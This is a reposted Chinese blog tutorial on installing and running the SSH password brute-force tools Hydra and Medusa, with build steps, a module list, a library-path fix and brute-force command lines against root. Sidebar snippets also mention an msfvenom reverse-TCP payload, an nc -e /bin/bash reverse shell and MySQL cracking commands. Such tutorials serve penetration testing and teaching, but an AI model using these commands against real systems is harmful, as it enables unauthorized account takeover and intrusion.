两款SSH爆破工具的介绍:hydra+medusa

最新推荐文章于 2024-02-23 10:30:00 发布
最新推荐文章于 2024-02-23 10:30:00 发布
阅读量9.4k 收藏 7
点赞数
文章标签: 两款SSH爆破工具的介绍hydra+me 暴力破解 网络安全

                                     

                                                                                    

                                                      两款SSH爆破工具的介绍:hydra+medusa

                                   

一、Hydra

 安装Hydra首先我们需要安装ssh组件 下载安装libssh:

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz 

 

    

 

tarzxvf libssh-0.4.8.tar.gz 

 

    

 

cdlibssh-0.4.8 

 

mkdirbuild 

 

cdbuild 

 

cmake -DCMAKE_INSTALL_PREFIX=/usr-DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON .. 

 

make 

 

makeinstall

 

 下载安装hydra

?

1

2

3

4

5

6

7

8

9

10

11

wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz 

 

tarzxf hydra-6.3-src.tar.gz 

 

cdhydra-6.3-src 

 

./configure 

 

make 

 

makeinstall

 

 使用 hydra 127.0.0.2 ssh -l root -P pass.txt  // pass.txt为爆破字典 二、medusa wget <a href="http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz">http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz</a>   tar -zxvf medusa-2.1.1.tar.gz   cd medusa-2.1.1   ./configure   make   make install  安装完成,查看medusa目前支持哪些模块

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

root@ubuntu:/home/goderci/Desktop/tools/medusa-2.1.1# medusa -d 

 

Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net</a>>

 

    

 

Available modules in"."

 

    

 

Available modules in"/usr/local/lib/medusa/modules"

 

+ cvs.mod : Brute force module forCVS sessions : version 2.0 

 

+ <a href="ftp://ftp.mod/">ftp.mod</a> : Brute force module forFTP/FTPSsessions : version 2.1 

 

+ imap.mod : Brute force module forIMAP sessions : version 2.0 

 

+ mysql.mod : Brute force module forMySQL sessions : version 2.0 

 

+ nntp.mod : Brute force module forNNTP sessions : version 2.0 

 

+ pcanywhere.mod : Brute force module forPcAnywhere sessions : version 2.0 

 

+ pop3.mod : Brute force module forPOP3 sessions : version 2.0 

 

+ rexec.mod : Brute force module forREXEC sessions : version 2.0 

 

+ rlogin.mod : Brute force module forRLOGIN sessions : version 2.0 

 

+ rsh.mod : Brute force module forRSH sessions : version 2.0 

 

+ smtp-vrfy.mod : Brute force module forenumerating accounts via SMTP VRFY : version 2.0 

 

+ smtp.mod : Brute force module forSMTP Authentication with TLS : version 2.0 

 

+ snmp.mod : Brute force module forSNMP Community Strings : version 2.1 

 

+ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod"[/usr/local/lib/medusa/modules/ssh.mod:filetoo short] 

 

+ telnet.mod : Brute force module fortelnet sessions : version 2.0 

 

+ vmauthd.mod : Brute force module forthe VMware Authentication Daemon : version 2.0 

 

+ vnc.mod : Brute force module forVNC sessions : version 2.0 

 

+ wrapper.mod : Generic Wrapper Module : version 2.0

 

 这里提醒注意一下: 虽然已安装了libssh但是找不到ssh路径,这需要我们手工添加一个。etc 目录 下面有一个 叫 ld.so.conf 的文件,指明 so 文件默认路径 ,一般的是 lib 和 usr lib ,编译出来的装在 usr local lib下了,所以要加一个,然后运行ldconfig,操作如下:

?

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

cat/etc/ld.so.conf 

 

include ld.so.conf.d/*.conf 

 

lsld.so.conf.d/ 

 

    

 

echo/usr/local/lib > /etc/ld.so.conf.d/local.conf 

 

cat/etc/ld.so.conf.d/* 

 

/usr/local/lib 

 

/usr/lib/mysql 

 

/usr/lib/qt-3.3/lib 

 

ls-l /usr/local/lib/libssh

 

-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a 

 

-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la 

 

lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.s 

 

o.1.0.1 

 

lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2 

 

.so.1.0.1 

 

-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1 

 

    

 

ldconfig

 

 在重新安装一次medusa就行了:) 使用:

medusa -H ip.txt -u root -P p.txt -M ssh 

 

转载自:http://www.2cto.com/article/201308/235377.html

William234
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
多线程SSH爆破
04-23
ssh环境,通过action触发一个多线程任务,每个任务调用一个继承HibernateDaoSupport的service的方法,现在要每个线程都绑定一个新的hibernate session
hydra强大的爆破工具,支持多种协议
05-05
hydra支持POP3,SMB,RDP、SSH,FTP,POP3,Telnet,MYSQL等协议的爆破
kali linux网络安全弱口令爆破常用命令(二)
最新发布
xnxqwzy的博客
02-23 993
KaliLinux中的Hydra是一款强大的网络登录破解工具,它支持多种协议,如FTP、SSH、Telnet等。弱口令爆破是一种常见的网络攻击手段,通过尝试不同的用户名和密码组合来获取系统的访问权限。Hydra是一款强大的暴力破解工具,可以用于执行弱口令爆破。要尝试破解的目标主机的IP地址或域名。目标主机上服务运行的端口号。目标主机上服务使用的协议,如SSH、FTP等。目标主机上服务的类型,如SSH服务的用户名枚举、密码破解等。指定Hydra使用的攻击方法,如暴力破解、字典攻击等。
九头蛇安全测试工具Hydra v9.1)
08-10
一款功能强大,目的合法,易于操作的安全测试工具 此Windows适用版本为Thomas D.提供的脚本,供大家研究学习之用 下载后直接解压至D盘即可(任意)
hydra 爆破工具
02-22
windows 版 hydra 爆破工具,仅供学习。
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;若全部情况验证后都不符合题目的全部条件,则本题无解。穷举法也称为枚举法
ssh爆破工具hydra.zip
04-27
ssh爆破工具hydra.zip
使用hydra进行SSH爆破
qq_53218512的博客
06-02 4734
mobaxterm 的功能非常全面,几乎提供了所有重要的远程网络工具(比如 SSH、X11、RDP、VNC、FTP、MOSH 等),以及 Windows 桌面上的 Unix 命令(bash、ls、cat、sed、grep、awk、rsync 等),登录之后默认开启 sftp 模式。命令的意思是:使用bin.bash里面的shell,用nc命令反弹shell,反弹到攻击机的7777端口,-e代表需要执行的指令,这里是要执行/bin/bash。发现通过计划任务执行了bash/tmp下面的task.sh文件。
【WEB_脚本开发】简易SSH爆破工具
HWHXY的博客
03-09 575
https://github.com/hwhxy/sshCrack
简述两种爆破ssh弱口令的方法
顶峰
10-20 1059
ssh
SSH暴力破解
xigua2540的博客
06-12 2272
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell,反弹到192.168.10.224的4444端口。少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名。SSH基于用户名密码的身份验证,容易遭受密码暴力破解攻击;
ory-hydra离线安装包
01-12
ory-hydra离线安装包,解压就可以直接用
CentOS release 6.5 编译安装hydra
快递小可的博客
01-06 3399
CentOS release 6.5 编译安装hydra
Hydra爆破SSH
HAKUNAMATATATTA的博客
11-28 1866
Hydra是一款开源的暴力破解工具,支持FTP、MSSQL、MySQL、PoP3、SSH暴力破解
靶机(potato-suncsr)——ssh暴力破解工具包括:cewl(爬虫)、hydra(九头蛇)、nmap、arp-scan、dirsearch)
一大口木的博客
04-11 1533
第一次使用靶机,很好玩,我感觉靶机就是有漏洞的一个虚拟机,你可以在vmware里打开,然后用kali攻击,获取权限,或者盗取信息链接: https://pan.baidu.com/s/1KFYQkEP_KAr3lJZOfQ2-Ig?pwd=2cbh 提取码: 2cbh 复制这段内容后打开百度网盘手机App,操作更方便哦开始正题。
Hydra爆破shh弱口令
weixin_51151498的博客
12-06 949
Hydra爆破shh弱口令
一次SSH爆破攻击haiduc工具的应急响应
2201_75571291的博客
08-29 191
2022年3月底,我安服团队在网络安全监测中发现某网络攻击组织利用SSH爆破投放挖矿程序的活动比较活跃,主要涉及的是一个haiduc的工具。二、
Hydra密码爆破工具使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
qq_53058639的博客
09-04 304
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Kali系列之Hydra/Medusa mysql密码爆破
05-13
HydraMedusa是常用的密码爆破工具,可以用于测试弱密码。这里以MySQL为例进行演示。 首先,安装HydraMedusa。在Kali Linux中,可以使用以下命令安装: ``` sudo apt-get install hydra sudo apt-get install medusa ``` 然后,使用HydraMedusa进行MySQL密码爆破。以下是使用Hydra的命令示例: ``` hydra -L username.txt -P password.txt mysql://ip_address ``` 其中,`username.txt`和`password.txt`分别是用户名和密码的字典文件,`ip_address`是目标MySQL服务器的IP地址。执行该命令后,Hydra将尝试使用字典文件中的用户名和密码进行爆破。 另外,以下是使用Medusa的命令示例: ``` medusa -h ip_address -U username.txt -P password.txt -M mysql ``` 其中,`ip_address`是目标MySQL服务器的IP地址,`username.txt`和`password.txt`分别是用户名和密码的字典文件,`-M mysql`指定使用MySQL协议进行爆破。执行该命令后,Medusa将尝试使用字典文件中的用户名和密码进行爆破。 需要注意的是,在进行密码爆破测试时,需要获得授权并遵守法律法规,不得用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值